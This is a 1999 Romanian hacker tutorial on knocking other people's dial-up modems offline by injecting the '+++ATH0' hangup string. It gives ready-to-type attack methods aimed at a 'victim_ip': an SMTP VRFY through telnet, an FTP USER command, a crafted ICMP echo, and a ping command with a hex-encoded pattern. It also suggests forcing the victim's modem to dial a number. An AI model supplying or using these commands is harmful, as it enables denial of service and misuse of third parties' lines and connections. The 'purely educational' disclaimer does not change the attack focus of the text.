E-RoHacker

	Sign In Sign-Up

		DoS Attack. Target: M0dem
	Intai de toate ar trebui sa stim cateva lucruri despre modemuri. Nu voi intra prea mult in detalii ca sa nu va zapaciti. Aceste modemuri raspund la niste comenzi, care nu sunt altceva decat niste stringuri. De exemplu ATZ, ATI, ATDP ... si nu in ultimul rand +++ATH0. Primind aceste stringuri modemul le interpreteaza ca atare. Astfel pentru ATZ modemul se va initializa, pentru ATDP va forma un numar, iar pentru +++ATH0 modemul se va inchide(HANGUP). In ideea ca ati inteles care e treaba cu comezile si cum le interpreteaza modemul nu ne mai ramane decat sa ne intrebam cum ne folosim de ele pentru a inchide modemul altor persoane. Tot ce ne mai ramane de facut este sa gasim metoda prin care sa trimitem aceste stinguri altor modemuri. Atentie! nu toate modemurile sunt vulnerabile. Doar 30%-40% s-au dovedit a fi vulnerabile. Modemurile US ROBOTICS si ROKWELL par sa fie neafectate. In continuare am sa va prezint cateva metode destul de practice. 1)Folosindu-va de SendMail: telnet victim_ip 25 VRFY +++ATH0 550 +++ATH0... User unknown close Nu va speriati de "User unknown"! Modemul va interpreta +++ATH0 si se va inchide. 2)Conectati-va pe FTP si tastati "USER +++ATH0". Normal veti primi un mesaj: "331 Password required for +++ATH0". Inca o data nu va speriati de acest mesaj. Gata. Modemul interpreteaza +++ATH0 si se deconecteaza. 3)Aceasta metoda e ceva mai dificila pentru cei care nu stiu sa programeze. Oricum ideea e sa trimiti un ICMP ECHO_RESPONSE "umplut" cu stringul "+++ATH0<CR>". Atentie <CR> este necesar. 4)Pentru cei care au Linux/Unix, in general Open Sistems vom trimite aceste stringuri cu ajutorul comenzii Ping. Deci vom trimite un ping cu pattern, unde pattern-ul va contine stringul. Incercati sa intelegeti ce va urma: Ord('+')=43 in baza 10, dar Ord('+')=2b in baza 16. Deci 43(care este codul ASCII pentru "+") in baza 10 este egal cu 2b in baza 16 Ati prins Ideea? Hai sa ne uitam la tabelul urmator: `\|CHR\| DEC\|HEX\| \| + \| 43 \|2b \| \| A \| 65 \|41 \| \| T \| 84 \|54 \| \| H \| 72 \|48 \| \| 0 \| 48 \|30 \| \|CR \| 13 \|0d \|` Deci stringul +++ATH0 = 2b2b2b415448300d in hexa pentru pattern. Daca ati inteles ce se intampla cu transformarile astea tastati in shell vostru: < bla@bla?> ping -p 2b2b2b415448300d -c 5 victim_ip Cam astea ar fi metodele. Tot ce va ramane este sa fiti originali si al dracu de creativi. Incercati si voi sa combinati un +++ATH0 cu un ATDP890123 :) . Partea buna a lucrurilor e ca si merge! [eof] PRAGMA PHOBYA Nickname: Kebab or Clonatu @ Undernet #rocrack Mail: pphobya@hotmail.com Declaratie: Nu imi asum nici o responsabilitate pentru orice distrugere, stricaciune pe care o veti provoca in urma citirii acestui articol. Scopul acestui material este pur EDUCATIV. Copyright (C) 1999 PRAGMA PHOBYA from HackDamage.


		PRAGMA PHOBYA